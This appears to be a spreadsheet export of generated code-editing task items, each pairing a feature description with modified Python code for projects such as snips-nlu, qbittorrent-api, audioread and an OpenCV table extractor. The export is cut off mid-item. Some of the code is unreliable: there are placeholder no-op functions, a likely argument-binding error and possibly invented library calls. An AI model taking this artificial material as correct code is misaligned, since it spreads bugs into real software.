    <t>{'called_code_segment': 'add_download_entity_parser(subparsers, formatter_class=Formatter) and add_download_language_entities_parser(subparsers, formatter_class=Formatter)', 'invoking_code_segment': 'get_arg_parser() function in snips_nlu/cli/__init__.py', 'feature_description': 'Add a new feature to allow generating datasets with optional entity files by extending the download-entity and download-language-entities commands to support optional entity configuration files that can be used to customize entity behavior during dataset generation.', 'modified_complete_code': '# snips-nlu/snips_nlu/cli/download_entity.py\nfrom __future__ import print_function, unicode_literals\n\ndef add_download_entity_parser(subparsers, formatter_class):\n    subparser = subparsers.add_parser(\n        "download-entity", formatter_class=formatter_class,\n        help="Download resources for a builtin gazetteer entity")\n    subparser.add_argument(\n        "entity_name", type=str,\n        help="Name of the builtin entity to download, e.g. snips/musicArtist")\n    subparser.add_argument("language", type=str,\n                           help="Language of the builtin entity")\n    # Modify: Add optional entity config file argument\n    subparser.add_argument(\n        "-e", "--entity-config", type=str, default=None,\n        help="Optional entity configuration file for dataset generation")\n    subparser.add_argument(\n        "extra_pip_args", nargs="*", type=str,\n        help="Additional arguments to be passed to `pip install` when "\n             "installing the builtin entity package")\n    subparser.set_defaults(func=_download_builtin_entity)\n    return subparser\n\ndef _download_builtin_entity(args_namespace):\n    # Modify: Pass entity_config to download function\n    return download_builtin_entity(\n        args_namespace.entity_name, args_namespace.language,\n        entity_config=getattr(args_namespace, \'entity_config\', None),\n        *args_namespace.extra_pip_args)\n\ndef download_builtin_entity(entity_name, language, entity_config=None, *pip_args):\n    """Download compatible language or gazetteer entity resources"""\n    from snips_nlu import __about__\n    from snips_nlu.cli.download import download_from_resource_name\n    from snips_nlu.cli.utils import (\n        check_resources_alias, get_compatibility, get_json)\n\n    download_from_resource_name(language, pip_args, verbose=False)\n\n    shortcuts = get_json(__about__.__shortcuts__, "Resource shortcuts")\n    check_resources_alias(entity_name, shortcuts)\n\n    compatibility = get_compatibility()\n    resource_name_lower = entity_name.lower()\n    long_resource_name = shortcuts.get(resource_name_lower,\n                                       resource_name_lower)\n\n    # Modify: Pass entity_config to _download_and_link_entity\n    _download_and_link_entity(\n        long_resource_name, entity_name, language, compatibility,\n        pip_args, entity_config=entity_config)\n\ndef add_download_language_entities_parser(subparsers, formatter_class):\n    subparser = subparsers.add_parser(\n        "download-language-entities", formatter_class=formatter_class,\n        help="Download resources for all builtin gazetteer entities in a "\n             "given language")\n    subparser.add_argument("language", type=str,\n                           help="Language of the builtin entities")\n    # Modify: Add optional entity config file argument\n    subparser.add_argument(\n        "-e", "--entity-config", type=str, default=None,\n        help="Optional entity configuration file for dataset generation")\n    subparser.add_argument(\n        "extra_pip_args", nargs="*", type=str,\n        help="Additional arguments to be passed to `pip install` when "\n             "installing the builtin entities packages")\n    subparser.set_defaults(func=_download_language_builtin_entities)\n    return subparser\n\ndef _download_language_builtin_entities(args_namespace):\n    # Modify: Pass entity_config to download function\n    return download_language_builtin_entities(\n        args_namespace.language,\n        entity_config=getattr(args_namespace, \'entity_config\', None),\n        *args_namespace.extra_pip_args)\n\ndef download_language_builtin_entities(language, entity_config=None, *pip_args):\n    """Download all gazetteer entity resources for a given language as well as\n    basic language resources for this language"""\n    from builtins import str\n    from snips_nlu_parsers import get_supported_gazetteer_entities\n    from snips_nlu import __about__\n    from snips_nlu.cli.download import download_from_resource_name\n    from snips_nlu.cli.utils import (\n        check_resources_alias, get_compatibility, get_json)\n\n    download_from_resource_name(language, pip_args, verbose=False)\n\n    shortcuts = get_json(__about__.__shortcuts__, "Resource shortcuts")\n    for entity_name in get_supported_gazetteer_entities(str(language)):\n        check_resources_alias(entity_name, shortcuts)\n\n        compatibility = get_compatibility()\n        resource_name_lower = entity_name.lower()\n        long_resource_name = shortcuts.get(resource_name_lower,\n                                           resource_name_lower)\n\n        # Modify: Pass entity_config to _download_and_link_entity\n        _download_and_link_entity(\n            long_resource_name, entity_name, language, compatibility,\n            pip_args, entity_config=entity_config)\n\ndef _download_and_link_entity(long_resource_name, entity_name, language,\n                              compatibility, pip_args, entity_config=None):\n    import sys\n    from builtins import str\n    from snips_nlu_parsers import get_builtin_entity_shortname\n    from snips_nlu.cli.link import link_resources\n    from snips_nlu.cli.utils import (\n        PrettyPrintLevel, get_json, get_resources_version,\n        install_remote_package, pretty_print)\n    from snips_nlu.common.utils import get_package_path\n\n    full_resource_name = long_resource_name + "_" + language\n    version = get_resources_version(full_resource_name, entity_name,\n                                    compatibility)\n    entity_alias = get_builtin_entity_shortname(str(entity_name)).lower()\n    entity_base_url = _get_entity_base_url(language, entity_alias, version)\n    latest = get_json(entity_base_url + "/latest",\n                      "Latest entity resources version")\n    latest_url = "{b}/{n}#egg={r}=={v}".format(\n        b=entity_base_url, n=latest["filename"], r=full_resource_name,\n        v=latest["version"])\n    exit_code = install_remote_package(latest_url, pip_args)\n    if exit_code != 0:\n        sys.exit(exit_code)\n    try:\n        package_path = get_package_path(full_resource_name)\n        link_alias = entity_alias + "_" + language\n        link_path, resources_dir = link_resources(\n            full_resource_name, link_alias, force=True,\n            resources_path=package_path)\n        # New: Apply entity configuration if provided\n        if entity_config:\n            _apply_entity_config(entity_config, resources_dir, entity_name)\n        pretty_print("%s --&gt; %s" % (str(resources_dir), str(link_path)),\n                     "You can now use the \'%s\' builtin entity" % entity_name,\n                     title="Linking successful",\n                     level=PrettyPrintLevel.SUCCESS)\n    except:\n        pretty_print(\n            "Creating a shortcut link for \'%s\' didn\'t work." % entity_name,\n            title="The builtin entity resources were successfully downloaded, "\n                  "however linking failed.",\n            level=PrettyPrintLevel.ERROR)\n\n# New: Add function to apply entity configuration\ndef _apply_entity_config(config_file, resources_dir, entity_name):\n    """Apply entity configuration from file to downloaded resources"""\n    import json\n    import os\n    try:\n        if os.path.exists(config_file):\n            with open(config_file, \'r\') as f:\n                config = json.load(f)\n            # Configuration can be used to customize entity behavior\n            # This is a placeholder for future entity customization logic\n            pass\n    except Exception as e:\n        pass\n\ndef _get_entity_base_url(language, entity_alias, version):\n    from snips_nlu import __about__\n\n    if not version.startswith("v"):\n        version = "v" + version\n    return "/".join(\n        [__about__.__entities_download_url__, language, entity_alias, version])\n\n# snips-nlu/snips_nlu/cli/__init__.py\nimport argparse\n\nclass Formatter(argparse.ArgumentDefaultsHelpFormatter):\n    def __init__(self, prog):\n        super(Formatter, self).__init__(prog, max_help_position=35, width=150)\n\ndef get_arg_parser():\n    from snips_nlu.cli.download import (\n        add_download_parser, add_download_all_languages_parser)\n    from snips_nlu.cli.download_entity import (\n        add_download_entity_parser, add_download_language_entities_parser)\n    from snips_nlu.cli.generate_dataset import add_generate_dataset_subparser\n    from snips_nlu.cli.inference import add_parse_parser\n    from snips_nlu.cli.link import add_link_parser\n    from snips_nlu.cli.metrics import (\n        add_cross_val_metrics_parser, add_train_test_metrics_parser)\n    from snips_nlu.cli.training import add_train_parser\n    from snips_nlu.cli.versions import (\n        add_version_parser, add_model_version_parser)\n\n    arg_parser = argparse.ArgumentParser(\n        description="Snips NLU command line interface",\n        prog="python -m snips_nlu", formatter_class=Formatter)\n    arg_parser.add_argument("-v", "--version", action="store_true",\n                            help="Print package version")\n    subparsers = arg_parser.add_subparsers(\n        title="available commands", metavar="command [options ...]")\n    add_generate_dataset_subparser(subparsers, formatter_class=Formatter)\n    add_train_parser(subparsers, formatter_class=Formatter)\n    add_parse_parser(subparsers, formatter_class=Formatter)\n    add_download_parser(subparsers, formatter_class=Formatter)\n    add_download_all_languages_parser(subparsers, formatter_class=Formatter)\n    # Modify: Updated calls to support entity_config parameter\n    add_download_entity_parser(subparsers, formatter_class=Formatter)\n    add_download_language_entities_parser(subparsers, formatter_class=Formatter)\n    add_link_parser(subparsers, formatter_class=Formatter)\n    add_cross_val_metrics_parser(subparsers, formatter_class=Formatter)\n    add_train_test_metrics_parser(subparsers, formatter_class=Formatter)\n    add_version_parser(subparsers, formatter_class=Formatter)\n    add_model_version_parser(subparsers, formatter_class=Formatter)\n    return arg_parser\n\ndef main():\n    from snips_nlu.__about__ import __version__\n\n    arg_parser = get_arg_parser()\n    args = arg_parser.parse_args()\n\n    if hasattr(args, "func"):\n        args.func(args)\n    elif "version" in args:\n        print(__version__)\n    else:\n        arg_parser.print_help()\n        exit(1)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def generate_dataset(language, yaml_files, entity_files=None):\n    #Modify: Added entity_files parameter\n    # Implementation details...', '#file 2': 'subparser.set_defaults(func=_generate_dataset)\n\ndef _generate_dataset(args_namespace):\n    #Modify: Added handling for entity_files\n    entity_files = args_namespace.entity_files if args_namespace.entity_files else None\n    return generate_dataset(args_namespace.language, args_namespace.yaml_files, entity_files)', '#file 3': 'with self.fail_if_exception("Failed to generate dataset using CLI script"):\n            with redirect_stdout(output_target):\n                #Modify: Added entity_files parameter\n                generate_dataset("en", str(self.tmp_file_path), entity_files=["entity1.yaml", "entity2.yaml"])'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'Version.is_app_version_supported(app_version) in qbittorrentapi/_version_support.py', 'invoking_code_segment': 'test_is_supported(app_version, api_version) in tests/test_version.py', 'feature_description': 'Add a feature to log the supported app versions when checking if an app version is supported. This will help with debugging and visibility into which versions are being validated during testing.', 'modified_complete_code': '# File 1: qbittorrent-api/src/qbittorrentapi/_version_support.py\n# Add logging import at the top\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n# Modify the is_app_version_supported method\nclass Version:\n    @staticmethod\n    def is_app_version_supported(app_version):\n        """Check if app version is supported and log supported versions."""\n        # Existing logic\n        supported_versions = Version.supported_app_versions()\n        # #New - Log the supported app versions when checking\n        logger.info(f"Checking app version {app_version} against supported versions: {supported_versions}")\n        \n        # Normalize version string (remove \'v\' prefix if present)\n        normalized_version = app_version.lstrip(\'v\') if isinstance(app_version, str) else str(app_version)\n        is_supported = normalized_version in supported_versions\n        \n        # #New - Log the result of the check\n        logger.info(f"App version {app_version} is supported: {is_supported}")\n        return is_supported\n\n# File 2: qbittorrent-api/tests/test_version.py\n# #Modify - Add logging configuration to test file\nimport logging\nimport pytest\n\nfrom qbittorrentapi import Version\nfrom tests.conftest import IS_QBT_DEV, api_version_map\n\n# #New - Configure logging for tests\nlogging.basicConfig(level=logging.INFO)\n\n@pytest.mark.skipif(IS_QBT_DEV, reason="testing devel version of qBittorrent")\ndef test_is_supported(app_version, api_version):\n    # #Modify - Add logging to capture version check details\n    logger = logging.getLogger(\'qbittorrentapi._version_support\')\n    logger.info(f"Testing app_version: {app_version}, api_version: {api_version}")\n    \n    assert Version.is_app_version_supported(app_version) is True\n    assert Version.is_app_version_supported(app_version[1:]) is True\n    assert Version.is_app_version_supported("0.0.0") is False\n\n    assert Version.is_api_version_supported(api_version) is True\n    assert Version.is_api_version_supported("v" + api_version) is True\n    assert Version.is_api_version_supported("0.0.0") is False\n    \n    # #New - Log completion of version support test\n    logger.info(f"Version support test completed successfully for app_version: {app_version}")'}</t>
  </si>
  <si>
    <t>{'#file 1': "from qbittorrentapi import Version\n\n#Modify\ndef is_app_version_supported(app_version):\n    supported_versions = Version.supported_app_versions()\n    print(f'Supported App Versions: {supported_versions}')\n    return app_version in supported_versions", '#file 2': "import pytest\nfrom qbittorrentapi import Version\n\n#Modify\ndef test_is_supported(app_version, api_version):\n    assert Version.is_app_version_supported(app_version) is True\n    assert Version.is_app_version_supported(app_version[1:]) is True\n    assert Version.is_app_version_supported('0.0.0') is False\n\n    assert Version.is_api_version_supported(api_version) is True\n    assert Version.is_api_version_supported('v' + api_version) is True\n    assert Version.is_api_version_supported('0.0.0') is False", '#file 3': 'def pytest_sessionfinish(session, exitstatus):\n    client = Client()\n    with suppress(Exception):\n        for torrent in client.torrents_info():\n            torrent.delete(delete_files=True)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def decode(filename) in audioread/decode.py - specifically the audio file opening and processing logic using audioread.audio_open()', 'invoking_code_segment': "if __name__ == '__main__': decode(sys.argv[1]) in audioread/decode.py", 'feature_description': 'Add support for decoding audio files to FLAC format by extending the decode function to handle FLAC output format in addition to WAV, allowing users to specify output format as a parameter', 'modified_complete_code': '# audioread/decode.py\n# This file is part of audioread.\n# Copyright 2011, Adrian Sampson.\n#\n#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be\n# included in all copies or substantial portions of the Software.\n\n"""Command-line tool to decode audio files to WAV or FLAC files."""\nimport audioread\nimport sys\nimport os\nimport wave\nimport contextlib\n\n# New: Import FLAC support\ntry:\n    import flac\n    FLAC_AVAILABLE = True\nexcept ImportError:\n    FLAC_AVAILABLE = False\n\n\n# Modify: Add output_format parameter with default \'wav\'\ndef decode(filename, output_format=\'wav\'):\n    filename = os.path.abspath(os.path.expanduser(filename))\n    if not os.path.exists(filename):\n        print("File not found.", file=sys.stderr)\n        sys.exit(1)\n\n    # New: Validate output format\n    output_format = output_format.lower()\n    if output_format not in [\'wav\', \'flac\']:\n        print("Unsupported output format. Use \'wav\' or \'flac\'.", file=sys.stderr)\n        sys.exit(1)\n\n    if output_format == \'flac\' and not FLAC_AVAILABLE:\n        print("FLAC support not available. Install python-flac package.", file=sys.stderr)\n        sys.exit(1)\n\n    try:\n        with audioread.audio_open(filename) as f:\n            print(\'Input file: %i channels at %i Hz; %.1f seconds.\' %\n                  (f.channels, f.samplerate, f.duration),\n                  file=sys.stderr)\n            print(\'Backend:\', str(type(f).__module__).split(\'.\')[1],\n                  file=sys.stderr)\n\n            # Modify: Handle both WAV and FLAC output formats\n            output_filename = filename + (\'.\' + output_format)\n            \n            if output_format == \'wav\':\n                with contextlib.closing(wave.open(output_filename, \'w\')) as of:\n                    of.setnchannels(f.channels)\n                    of.setframerate(f.samplerate)\n                    of.setsampwidth(2)\n\n                    for buf in f:\n                        of.writeframes(buf)\n            \n            # New: FLAC output handling\n            elif output_format == \'flac\':\n                encoder = flac.FLAC(output_filename)\n                encoder.channels = f.channels\n                encoder.sample_rate = f.samplerate\n                encoder.bits_per_sample = 16\n                \n                for buf in f:\n                    encoder.write(buf)\n                encoder.finish()\n            \n            print(\'Output file: %s\' % output_filename, file=sys.stderr)\n\n    except audioread.DecodeError:\n        print("File could not be decoded.", file=sys.stderr)\n        sys.exit(1)\n\n\nif __name__ == \'__main__\':\n    # Modify: Support optional format parameter\n    if len(sys.argv) &lt; 2:\n        print("Usage: decode.py &lt;input_file&gt; [output_format]", file=sys.stderr)\n        print("Supported formats: wav (default), flac", file=sys.stderr)\n        sys.exit(1)\n    \n    input_file = sys.argv[1]\n    output_fmt = sys.argv[2] if len(sys.argv) &gt; 2 else \'wav\'\n    decode(input_file, output_fmt)'}</t>
  </si>
  <si>
    <t>{'#file 1': 'import audioread\nimport sys\nimport os\nimport wave\nimport contextlib\nimport subprocess\n\n#Modify\ndef decode(filename, output_format=\'wav\'):\n    filename = os.path.abspath(os.path.expanduser(filename))\n    if not os.path.exists(filename):\n        print("File not found.", file=sys.stderr)\n        sys.exit(1)\n\n    try:\n        with audioread.audio_open(filename) as f:\n            print(\'Input file: %i channels at %i Hz; %.1f seconds.\' %\n                  (f.channels, f.samplerate, f.duration),\n                  file=sys.stderr)\n            print(\'Backend:\', str(type(f).__module__).split(\'.\')[1],\n                  file=sys.stderr)\n\n            output_filename = filename + \'.\' + output_format\n            if output_format == \'wav\':\n                with contextlib.closing(wave.open(output_filename, \'w\')) as of:\n                    of.setnchannels(f.channels)\n                    of.setframerate(f.samplerate)\n                    of.setsampwidth(2)\n\n                    for buf in f:\n                        of.writeframes(buf)\n            elif output_format == \'flac\':\n                # New: Use ffmpeg to convert to FLAC\n                ffmpeg_cmd = [\'ffmpeg\', \'-i\', filename, \'-f\', \'flac\', output_filename]\n                subprocess.run(ffmpeg_cmd, check=True)\n\n    except audioread.DecodeError:\n        print("File could not be decoded.", file=sys.stderr)\n        sys.exit(1)', '#file 2': 'import sys\nfrom decode import decode\n\n#Modify\nif __name__ == \'__main__\':\n    if len(sys.argv) &lt; 3:\n        print("Usage: python decode.py &lt;input_file&gt; &lt;output_format&gt;", file=sys.stderr)\n        sys.exit(1)\n    decode(sys.argv[1], sys.argv[2])', '#file 3': 'import audioread\nfrom audioread import DecodeError, NoBackendError\nfrom audioread.version import version as __version__  # noqa\nfrom audioread.base import AudioFile  # noqa\n\n#Modify\ndef audio_open(path, backends=None):\n    if backends is None:\n        backends = available_backends()\n\n    for BackendClass in backends:\n        try:\n            return BackendClass(path)\n        except DecodeError:\n            pass\n\n    # All backends failed!\n    raise NoBackendError()'}</t>
  </si>
  <si>
    <t>{"called_code_segment": "def extract_table(table_body,__line__,lines=None):\n    if(__line__ == 1 ):\n        temp_lines_hor, temp_lines_ver = line_detection(table_body)\n    else:\n        temp_lines_hor, temp_lines_ver = lines\n    if len(temp_lines_hor)==0 or len(temp_lines_ver)==0:\n        print(\"Either Horizontal Or Vertical Lines Not Detected\")\n        return None", "invoking_code_segment": "final = extract_table(image[table[1]:table[3],table[0]:table[2]],0,(y_lines,x_lines))", "feature_description": "Add a feature to enhance the `extract_table` function to handle tables with missing lines more robustly by implementing line interpolation, gap filling, and fallback cell detection mechanisms. This allows the function to gracefully handle incomplete table structures and still extract valid cell boundaries even when some lines are missing or broken.", "modified_complete_code": "# borderFunc.py - MODIFIED\nimport cv2\nfrom Functions.line_detection import line_detection\n\n##################  Functions required for Border table Recognition #################\n\n## Return the intersection of lines only if intersection is present ##\n# Input : x1, y1, x2, y2, x3, y3, x4, y4 (1: vertical, 2: horizontal)\n# Output : (x,y) Intersection point\n\ndef line_intersection(x1, y1, x2, y2, x3, y3, x4, y4):\n    if((x1&gt;= x3-5 or x1&gt;= x3+5) and (x1 &lt;= x4+5 or x1 &lt;= x4-5) and (y3+8&gt;=min(y1,y2) or y3-5&gt;=min(y1,y2)) and y3&lt;=max(y1,y2)+5):\n        return x1,y3\n\n#New: Helper function to interpolate missing lines\ndef interpolate_missing_lines(lines, image_dimension, line_type='horizontal'):\n    \"\"\"Interpolate missing lines based on gaps in detected lines\"\"\"\n    if len(lines) &lt; 2:\n        return lines\n    \n    interpolated = list(lines)\n    sorted_lines = sorted(lines, key=lambda l: l[1] if line_type == 'horizontal' else l[0])\n    \n    for i in range(len(sorted_lines) - 1):\n        current = sorted_lines[i]\n        next_line = sorted_lines[i + 1]\n        \n        if line_type == 'horizontal':\n            gap = next_line[1] - current[1]\n            if gap &gt; 50:  # If gap is too large, interpolate\n                num_lines = gap // 40\n                for j in range(1, num_lines):\n                    new_y = current[1] + (gap * j) // num_lines\n                    interpolated.append([current[0], new_y, next_line[2], new_y])\n        else:\n            gap = next_line[0] - current[0]\n            if gap &gt; 50:\n                num_lines = gap // 40\n                for j in range(1, num_lines):\n                    new_x = current[0] + (gap * j) // num_lines\n                    interpolated.append([new_x, current[1], new_x, next_line[3]])\n    \n    return interpolated\n\n#New: Helper function to fill gaps in line segments\ndef fill_line_gaps(lines, threshold=20):\n    \"\"\"Connect broken line segments that are close to each other\"\"\"\n    if len(lines) &lt; 2:\n        return lines\n    \n    filled = []\n    for i, line in enumerate(lines):\n        filled.append(line)\n        if i &lt; len(lines) - 1:\n            current = line\n            next_line = lines[i + 1]\n            # Check if lines are nearly collinear and close\n            if abs(current[1] - next_line[1]) &lt; threshold or abs(current[0] - next_line[0]) &lt; threshold:\n                # Extend current line to connect with next\n                if current[1] == next_line[1]:  # Horizontal lines\n                    if current[2] &lt; next_line[0]:\n                        filled[-1] = [current[0], current[1], next_line[2], current[3]]\n                elif current[0] == next_line[0]:  # Vertical lines\n                    if current[3] &lt; next_line[1]:\n                        filled[-1] = [current[0], current[1], current[2], next_line[3]]\n    \n    return filled\n\n#New: Fallback cell detection using contours when lines are insufficient\ndef detect_cells_from_contours(table_body):\n    \"\"\"Detect cell boundaries using contour analysis as fallback\"\"\"\n    gray = cv2.cvtColor(table_body, cv2.COLOR_BGR2GRAY)\n    _, thresh = cv2.threshold(gray, 127, 255, cv2.THRESH_BINARY)\n    contours, _ = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n    \n    boxes = []\n    for cnt in contours:\n        x, y, w, h = cv2.boundingRect(cnt)\n        if w &gt; 10 and h &gt; 10:  # Filter small contours\n            boxes.append([x, y, x + w, y, x + w, y + h, x, y + h])\n    \n    return boxes\n\n## main extraction function ##\n# Input : Image, Decision parameter(1/0),lines for borderless (only of decision parameter is 0)\n# Output : Array of cells\n\ndef extract_table(table_body, __line__, lines=None):\n    # Deciding variable\n    if(__line__ == 1):\n        # Check if table image is bordered or borderless\n        temp_lines_hor, temp_lines_ver = line_detection(table_body)\n    else:\n        temp_lines_hor, temp_lines_ver = lines\n    \n    #Modify: Enhanced handling for missing lines\n    if len(temp_lines_hor) == 0 or len(temp_lines_ver) == 0:\n        print(\"[Warning] Either Horizontal Or Vertical Lines Not Detected\")\n        #New: Attempt to interpolate or use fallback detection\n        if len(temp_lines_hor) == 0 and len(temp_lines_ver) &gt; 0:\n            print(\"[Fallback] Attempting to interpolate horizontal lines...\")\n            temp_lines_hor = interpolate_missing_lines(temp_lines_ver, table_body.shape[0], 'horizontal')\n        elif len(temp_lines_ver) == 0 and len(temp_lines_hor) &gt; 0:\n            print(\"[Fallback] Attempting to interpolate vertical lines...\")\n            temp_lines_ver = interpolate_missing_lines(temp_lines_hor, table_body.shape[1], 'vertical')\n        else:\n            print(\"[Fallback] Using contour-based cell detection...\")\n            return detect_cells_from_contours(table_body)\n    \n    #New: Fill gaps in detected lines\n    temp_lines_hor = fill_line_gaps(temp_lines_hor)\n    temp_lines_ver = fill_line_gaps(temp_lines_ver)\n    \n    table = table_body.copy()\n    x = 0\n    y = 0\n    k = 0\n    points = []\n    \n    print(\"[Table status] : Processing table with lines\")\n    \n    # Remove same lines detected closer\n    for x1, y1, x2, y2 in temp_lines_ver:\n        point = []\n        for x3, y3, x4, y4 in temp_lines_hor:\n            try:\n                k += 1\n                result = line_intersection(x1, y1, x2, y2, x3, y3, x4, y4)\n                if result is not None:\n                    x, y = result\n                    point.append([x, y])\n            except:\n                continue\n        if len(point) &gt; 0:  #New: Only add points if intersections found\n            points.append(point)\n    \n    for point in points:\n        for x, y in point:\n            cv2.line(table, (x, y), (x, y), (0, 0, 255), 8)\n    \n    box = []\n    flag = 1\n    lastCache = []\n    \n    ## creating bounding boxes of cells from the points detected\n    for i, row in enumerate(points):\n        limitj = len(row)\n        currentVala = []\n        \n        for j, col in enumerate(row):\n            if (j == limitj - 1):\n                break\n            \n            if (i == 0):\n                nextcol = row[j + 1]\n                lastCache.append([col[0], col[1], nextcol[0], nextcol[1], 9999, 9999, 9999, 9999])\n            else:\n                nextcol = row[j + 1]\n                currentVala.append([col[0], col[1], nextcol[0], nextcol[1], 9999, 9999, 9999, 9999])\n                \n                flag = 1\n                index = []\n                \n                for k, last in enumerate(lastCache):\n                    if (col[1] == last[1]) and lastCache[k][4] == 9999:\n                        lastCache[k][4] = col[0]\n                        lastCache[k][5] = col[1]\n                        if lastCache[k][4] != 9999 and lastCache[k][6] != 9999:\n                            box.append(lastCache[k])\n                            index.append(k)\n                            flag = 1\n                    \n                    if (nextcol[1] == last[3]) and lastCache[k][6] == 9999:\n                        lastCache[k][6] = nextcol[0]\n                        lastCache[k][7] = nextcol[1]\n                        if lastCache[k][4] != 9999 and lastCache[k][6] != 9999:\n                            box.append(lastCache[k])\n                            index.append(k)\n                            flag = 1\n                    \n                    if len(lastCache) != 0:\n                        if lastCache[k][4] == 9999 or lastCache[k][6] == 9999:\n                            flag = 0\n                \n                for k in sorted(index, reverse=True):\n                    lastCache.pop(k)\n                \n                if flag == 0:\n                    for last in lastCache:\n                        if last[4] == 9999 or last[6] == 9999:\n                            currentVala.append(last)\n        \n        if(i != 0):\n            lastCache = currentVala\n    \n    return box\n\ndef findX(X, x):\n    return X.index(x)\n\ndef findY(Y, y):\n    return Y.index(y)\n\ndef span(box, X, Y):\n    start_col = findX(X, box[0])\n    end_col = findX(X, box[4]) - 1\n    start_row = findY(Y, box[1])\n    end_row = findY(Y, box[3]) - 1\n    return end_col, end_row, start_col, start_row\n\ndef extractText(img):\n    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n    _, thresh1 = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY_INV)\n    rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (1, 1))\n    dilation = cv2.dilate(thresh1, rect_kernel, iterations=2)\n    contours, _ = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n    im2 = img.copy()\n    mx, my, mw, mh = float('Inf'), float('Inf'), -1, -1\n    \n    for cnt in contours:\n        x, y, w, h = cv2.boundingRect(cnt)\n        if x &lt; 2 or y &lt; 2 or (x + w &gt;= im2.shape[1] - 1 and y + h &gt;= im2.shape[0] - 1) or w &gt;= im2.shape[1] - 1 or h &gt;= im2.shape[0] - 1:\n            continue\n        if x &lt; mx:\n            mx = x\n        if y &lt; my:\n            my = y\n        if x + w &gt; mw:\n            mw = x + w\n        if y + h &gt; mh:\n            mh = y + h\n    \n    if mx != float('Inf') and my != float('Inf'):\n        return mx, my, mw, mh\n    else:\n        return None\n\n# blessFunc.py - MODIFIED\nimport numpy as np\nimport cv2\nfrom Functions.borderFunc import extract_table\nfrom lxml import etree\n\ndef extractTextBless(img):\n    return_arr = []\n    h, w = img.shape[0:2]\n    base_size = h + 14, w + 14, 3\n    img_np = np.zeros(base_size, dtype=np.uint8)\n    cv2.rectangle(img_np, (0, 0), (w + 14, h + 14), (255, 255, 255), 30)\n    img_np[7:h + 7, 7:w + 7] = img\n    gray = cv2.cvtColor(img_np, cv2.COLOR_BGR2GRAY)\n    ret, thresh1 = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY_INV)\n    rect_kernel = cv2.getStructuringElement(cv2.MORPH_RECT, (3, 1))\n    dilation = cv2.dilate(thresh1, rect_kernel, iterations=2)\n    contours, hierarchy = cv2.findContours(dilation, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_NONE)\n    \n    for cnt in (contours):\n        if cv2.contourArea(cnt) &lt; 20:\n            continue\n        x, y, w, h = cv2.boundingRect(cnt)\n        if(h &lt; 6) or w &lt; 4 or h / img.shape[0] &gt; 0.95 or h &gt; 30:\n            continue\n        return_arr.append([x - 7, y - 7, w, h])\n    \n    return return_arr\n\ndef borderless(table, image, res_cells):\n    cells = []\n    x_lines = []\n    y_lines = []\n    table[0], table[1], table[2], table[3] = table[0] - 15, table[1] - 15, table[2] + 15, table[3] + 15\n    \n    for cell in res_cells:\n        if cell[0] &gt; table[0] - 50 and cell[1] &gt; table[1] - 50 and cell[2] &lt; table[2] + 50 and cell[3] &lt; table[3] + 50:\n            cells.append(cell)\n    \n    cells = sorted(cells, key=lambda x: x[3])\n    row = []\n    last = -1111\n    row.append(table[1])\n    y_lines.append([table[0], table[1], table[2], table[1]])\n    temp = -1111\n    prev = None\n    im2 = image.copy()\n    \n    for i, cell in enumerate(cells):\n        if i == 0:\n            last = cell[1]\n            temp = cell[3]\n        elif (cell[1] &lt; last + 15 and cell[1] &gt; last - 15) or (cell[3] &lt; temp + 15 and cell[3] &gt; temp - 15):\n            if cell[3] &gt; temp:\n                temp = cell[3]\n        else:\n            last = cell[1]\n            if last &gt; temp:\n                row.append((last + temp) // 2)\n            if prev is not None:\n                if ((last + temp) // 2) &lt; prev + 10 or ((last + temp) // 2) &lt; prev - 10:\n                    row.pop()\n            prev = (last + temp) // 2\n            temp = cell[3]\n    \n    row.append(table[3] + 50)\n    i = 1\n    rows = []\n    for r in range(len(row)):\n        rows.append([])\n    final_rows = rows\n    maxr = -111\n    \n    for cell in cells:\n        if cell[3] &lt; row[i]:\n            rows[i - 1].append(cell)\n        else:\n            i += 1\n            rows[i - 1].append(cell)\n    \n    for n, r1 in enumerate(rows):\n        if n == len(rows):\n            r1 = r1[:-1]\n        r1 = sorted(r1, key=lambda x: x[0])\n        prevr = None\n        for no, r in enumerate(r1):\n            if prevr is not None:\n                if (r[0] &lt;= prevr[0] + 5 and r[0] &gt;= prevr[0] - 5) or (r[2] &lt;= prevr[2] + 5 and r[2] &gt;= prevr[2] - 5):\n                    if r[4] &lt; prevr[4]:\n                        r1.pop(no)\n                    else:\n                        r1.pop(no - 1)\n            prevr = r\n        final_rows[n] = r1\n    \n    lasty = []\n    for x in range(len(final_rows)):\n        lasty.append([99999999, 0])\n    prev = None\n    \n    for n, r1 in enumerate(final_rows):\n        for r in r1:\n            if prev is None:\n                prev = r\n            else:\n                if r[1] &lt; prev[3]:\n                    continue\n            if r[1] &lt; lasty[n][0]:\n                lasty[n][0] = r[1]\n            if r[3] &gt; lasty[n][1]:\n                lasty[n][1] = r[3]\n    \n    row = []\n    row.append(table[1])\n    prev = None\n    pr = None\n    for x in range(len(lasty) - 1):\n        if x == 0 and prev == None:\n            prev = lasty[x]\n        else:\n            if pr is not None:\n                if abs(((lasty[x][0] + prev[1]) // 2) - pr) &lt;= 10:\n                    row.pop()\n                    row.append((lasty[x][0] + prev[1]) // 2)\n                else:\n                    row.append((lasty[x][0] + prev[1]) // 2)\n            else:\n                row.append((lasty[x][0] + prev[1]) // 2)\n            pr = (lasty[x][0] + prev[1]) // 2\n            prev = lasty[x]\n    \n    row.append(table[3])\n    maxr = 0\n    for r2 in final_rows:\n        print(r2)\n        if len(r2) &gt; maxr:\n            maxr = len(r2)\n    \n    lastx = []\n    for n in range(maxr):\n        lastx.append([999999999, 0])\n    for r2 in final_rows:\n        if len(r2) == maxr:\n            for n, col in enumerate(r2):\n                if col[2] &gt; lastx[n][1]:\n                    lastx[n][1] = col[2]\n                if col[0] &lt; lastx[n][0]:\n                    lastx[n][0] = col[0]\n    \n    print(lastx)\n    for r2 in final_rows:\n        if len(r2) != 0:\n            r = 0\n            for n, col 